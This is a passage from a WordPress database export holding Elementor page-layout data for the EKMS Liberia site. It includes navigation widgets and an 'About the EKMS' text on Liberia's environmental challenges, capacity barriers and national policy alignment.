Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(17551,2589,'_elementor_version','2.7.5'),(17552,2589,'_elementor_template_type','wp-page'),(17553,2589,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(17555,2590,'_elementor_edit_mode','builder'),(17556,2590,'_elementor_template_type','wp-page'),(17557,2590,'_elementor_version','2.7.5'),(17558,2590,'_wp_page_template','default'),(17559,2590,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system 